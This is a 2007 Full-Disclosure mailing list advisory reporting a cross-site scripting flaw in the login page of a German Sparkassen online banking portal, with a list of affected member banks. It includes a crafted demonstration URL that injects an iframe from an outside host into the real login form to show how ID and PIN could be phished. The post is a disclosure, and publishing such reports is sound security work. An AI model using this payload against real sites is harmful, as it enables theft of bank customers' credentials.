full-disclosure-uk May 2007 archive

[Full-disclosure] XSS vulnerability on various german online banking sites (sparkasse)

From: Ulrich Keil <full-disclosure_at_nospam>
Date: Thu May 17 2007 - 04:08:34 GMT
To: full-disclosure@lists.grok.org.uk


The "Sparkassen-Finanzgruppe", with a transaction volume of over 3.300 billion euro, is one of the largest banks for private customers in Germany. Many local member banks of the group use the online banking portal provided by sfze (http://www.sfze.de/), a subsidiary company of Sparkassen-Finanzgruppe.

Vulnerability:
The online banking software of sfze does not check the HTTP GET parameter "KONTO" on the login page, and displays the content of this variable without modification within the HTML form area.

Impact:
An attacker may gather login data (ID+PIN) from customers of the Sparkassen-Finanzgruppe by tricking them into clicking a specially crafted link, which points to the original login page of the online banking system.

Demonstration:
The following trivial example demonstrates the impact of this vulnerability by extending the login form with an iframe: https://bankingportal.sparkasse-donnersberg.de/banking/?BLZ=54051990&Bankingaufruf.x=0&Bankingaufruf.y=0&KONTO=%22%20/%3E%3Ciframe%20src=%22http://www.derkeiler.com/uk/sp.html%22%20scrolling=%22no%22%20marginheight=%220%22%20marginwidth=%220%22%20frameborder=%220%22width=%22310px%22

Some subsidiary companies of Sparkassen-Finanzgruppe which are affected by this vulnerability:
- Sparkasse Donnersberg
- Sparkasse Ludwigshafen
- Sparkasse KölnBonn
- Sparkasse Aachen
- Frankfurter Sparkasse
- Sparkasse Rhein Neckar Nord

Ulrich Keil
--

http://www.derkeiler.com
PGP Fingerprint: 5FA4 4C01 8D92 A906 E831 CAF1 3F51 8F47 1233 9AAD
Public key available at http://www.derkeiler.com/uk/pgp-key.asc



Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/